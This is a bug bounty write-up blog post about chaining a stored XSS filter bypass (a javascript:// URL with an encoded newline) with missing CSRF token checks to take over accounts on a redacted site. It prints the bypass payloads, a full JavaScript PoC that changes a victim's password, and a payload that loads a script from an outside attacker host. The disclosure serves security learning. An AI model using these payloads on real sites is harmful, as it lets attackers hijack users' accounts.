XSS + CSRF = Bhoom!

Hello :D Everyone,

It had been a long time since I got a good bug, and a bounty too :3, so after an OWASP meetup where I met many leet bounty hunters I felt motivated to do a bug hunt. I started poking around, and this is the story of a simple full account takeover on a HackerOne private program.

Reported to: ****************
Types: Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS)
1. Stored XSS (Requires Interaction)
I found an XSS on the main domain in the Website field of the user's profile. I first tried javascript:alert(1) to see whether JavaScript could be executed, but the field rejected it as an invalid URL, so I modified the payload so that it still looks like a URL: javascript://http://google.com/?aaaa%0aalert(1). That passed the check and executed. For those who don't know, this is how the browser reads it:

javascript:              - JavaScript's pseudo-protocol (scheme); when the link is followed, the rest of the URL is percent-decoded and run as script
//                       - begins a single-line comment in JavaScript
http://google.com/?aaaa  - the comment body; never executed, it only makes the value look like a URL
%0a                      - a URL-encoded newline (LF); once decoded it ends the single-line comment
alert(1)                 - ordinary JavaScript on the next line, which runs
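The breakdown above, as an added example that is not part of the original post: a small JavaScript model of what the browser does with a javascript: href (strip the scheme, percent-decode, evaluate) next to two validators, a naive "contains ://" check of the kind the field appears to have used, and a scheme allowlist built on the WHATWG URL parser. The function names and the naive check are assumptions for illustration; the payload is the post's own.

```javascript
// Added example (not from the original post): models what the browser does with a
// javascript: href and contrasts a naive URL check with a scheme allowlist.
// jsUrlScriptSource/naiveLooksLikeUrl/isSafeLink are assumed names, not the site's code.

// What the browser evaluates when a javascript: link is followed: it strips the
// scheme and percent-decodes the remainder, so %0a becomes a real newline.
function jsUrlScriptSource(href) {
  const m = /^javascript:/i.exec(href);
  if (!m) return null;
  return decodeURIComponent(href.slice(m[0].length));
}

// A validator of the kind the field seemed to use: "does it look like a URL?"
// The post's payload passes it because of the "://" in the comment part.
function naiveLooksLikeUrl(value) {
  return value.includes("://");
}

// Allowlist the parsed scheme instead. The WHATWG URL parser lowercases the scheme
// and removes embedded tabs/newlines, so case and whitespace tricks do not get past it.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
function isSafeLink(value) {
  let url;
  try {
    url = new URL(value);            // absolute URL only
  } catch (e) {
    return false;                    // relative or unparsable: reject
  }
  return ALLOWED_SCHEMES.has(url.protocol);
}

const payload = "javascript://http://google.com/?aaaa%0aalert(1)";
console.log(JSON.stringify(jsUrlScriptSource(payload)));
// "//http://google.com/?aaaa\nalert(1)"  -> line 1 is a comment, line 2 runs
console.log(naiveLooksLikeUrl(payload), isSafeLink(payload)); // true false
```

The point of the allowlist is that it asks the URL parser what the browser will actually do with the value, rather than pattern-matching the string; anything whose parsed protocol is not http: or https: is refused, including data: and javascript: in every spelling.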

So it was saved on my profile. It still needed the victim to click the attacker's website link, so the attack works by sending the victim a link to the attacker's profile page, which is publicly accessible. That's a simple stored XSS with an easy filter bypass. Before reporting I decided to dig further, and I found that the "Change Password" functionality does not ask for the user's current password. That is exactly what you want when you already have an XSS :D, because the injected script can set a new password without knowing the old one.


2. CSRF Bypass
Even though I had an XSS, I checked whether an anti-CSRF token was enforced (not that it mattered much: with XSS running in the site's origin you can fetch the form with XHR and read the token out of the response). To see whether the token was validated server side, I simply removed the authenticity_token parameter from the form submission, and boom! the password was updated without it. When you test this, try all three variants: remove the parameter, send it empty, and send a token copied from another account, since some implementations only validate a token that is actually present.

3. Full Account Takeover
Combining the XSS with the missing current-password check, I built a PoC that takes over the victim's account with a single click on the attacker's profile's Website link. The only precondition is that the victim is logged in.

Earlier, while changing the password, I noticed that the form was submitted to an endpoint containing a unique user id that is not publicly known:
https://www.******.com/users/{UNIQUE ID}
So the script only needs to obtain the victim's user id; since the CSRF token is not validated, it does not need to fetch that.

So I made an XHR request to /account (several other endpoints also contain the user_id in their page source), extracted the victim's user_id from the response, and submitted the password-change form to that user's endpoint.







I hosted this JavaScript on an HTTPS domain (the target is HTTPS, so a script served over plain HTTP would be blocked as mixed content). Because the payload injects a script tag into the site's own page, the script runs in the site's origin: the XMLHttpRequest below is same-origin, the victim's session cookie is sent automatically, and the response body can be read. Two things have to be right for it to work: the request is asynchronous, so the form must be built and submitted inside the onload handler rather than straight after http.send() (otherwise user_id is still undefined when the form is submitted), and the form must be attached to the document before calling submit().

// Step 1: fetch /account with the victim's session and pull the user id out of the
// edit form, whose id attribute has the form "edit_user_<id>".
var http = new XMLHttpRequest();
http.open("GET", "https://www.*******.com/account", true);
http.onload = function () {
    if (http.status !== 200) { return; }
    var dom = new DOMParser().parseFromString(http.responseText, "text/html");
    var user_id = dom.getElementsByClassName("edit_user")[0].id.split("_")[2];
    changePassword(user_id);
};
http.send();

// Step 2: rebuild the site's own password-change form with the same field names,
// minus authenticity_token (the server did not validate it), and submit it.
function changePassword(user_id) {
    var f = document.createElement("form");
    f.action = "https://www.********.com/users/" + user_id;
    f.method = "POST";
    f.className = "edit_user";
    f.id = "edit_user_" + user_id;

    function hidden(name, value) {
        var i = document.createElement("input");
        i.type = "hidden";
        i.name = name;
        i.value = value;
        return i;
    }
    f.appendChild(hidden("utf8", "✓"));
    f.appendChild(hidden("_method", "put"));    // method override: the server handles the POST as a PUT
    f.appendChild(hidden("page", "password"));

    var pw = document.createElement("input");
    pw.type = "password";
    pw.id = "user_password";
    pw.name = "user[password]";
    pw.value = "my1337pass";                    // the new password the victim ends up with
    f.appendChild(pw);

    var submit = document.createElement("input");
    submit.type = "submit";
    submit.name = "commit";
    submit.className = "button";
    f.appendChild(submit);

    document.body.appendChild(f);               // a detached form will not submit
    f.submit();
}

Then I entered
 javascript://http://google.com.?a%0avar x=document.createElement('script');x.src='https://myhost/script.js';document.body.appendChild(x);
in the Website field and updated my (attacker's) profile. This is the same trick as before: everything after // up to the newline is a comment, and the code after %0a loads the hosted script into the page, where it runs with the victim's session.



Now all the victim had to do was click the attacker's website link, and BOOM! their password was changed to 'my1337pass'.


I got a fair enough bounty :D.

Thanks to every awesome infosec people who share their knowledge.

20 comments:

  1. bug bounty gawd, h1 private site

  2. Amazing PoC dude! Thanks for sharing!

    https://twitter.com/knowledge_2014

    best regards
    ak1t4

  3. I am confused about javascript://http://google.com/?aaaa%0aalert(1). This payload still runs and works on many domains; what is this?
